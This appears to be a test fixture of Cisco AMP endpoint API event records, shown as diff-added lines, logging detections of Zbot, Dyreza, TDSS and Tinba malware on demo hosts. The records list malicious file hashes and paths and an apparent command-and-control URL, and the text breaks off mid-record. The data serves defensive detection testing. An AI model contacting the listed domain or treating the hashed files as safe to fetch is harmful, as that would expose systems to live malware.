+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667064295457000,"timestamp":1610705453,"timestamp_nanoseconds":478000000,"date":"2021-01-15T10:10:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667064295456780","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257340669428000,"timestamp":1610705452,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:10:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257340669427770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667055705522000,"timestamp":1610705451,"timestamp_nanoseconds":565000000,"date":"2021-01-15T10:10:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667055705522187","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268414885822000,"timestamp":1610705411,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:10:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855181","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":810000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855180","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855179","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257087266357000,"timestamp":1610705393,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:09:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257087266357305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":469000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":344000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666793712517000,"timestamp":1610705390,"timestamp_nanoseconds":948000000,"date":"2021-01-15T10:09:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666793712517128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666785122583000,"timestamp":1610705388,"timestamp_nanoseconds":372000000,"date":"2021-01-15T10:09:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666785122582535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":596,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257040021717000,"timestamp":1610705382,"timestamp_nanoseconds":304000000,"date":"2021-01-15T10:09:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257040021717048","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256988482109000,"timestamp":1610705370,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:09:30+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256988482109495","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":782000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203910","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203909","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666694928269000,"timestamp":1610705367,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:09:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666694928269316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":2204,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256962712306000,"timestamp":1610705364,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:09:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256962712305718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617250006073000,"timestamp":1610705347,"timestamp_nanoseconds":296000000,"date":"2021-01-15T10:09:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617250006073346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":706000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053698","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://dak1otavola1ndos.com/h/index.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":222000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053697","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617228531237000,"timestamp":1610705342,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:09:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617228531236865","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\My 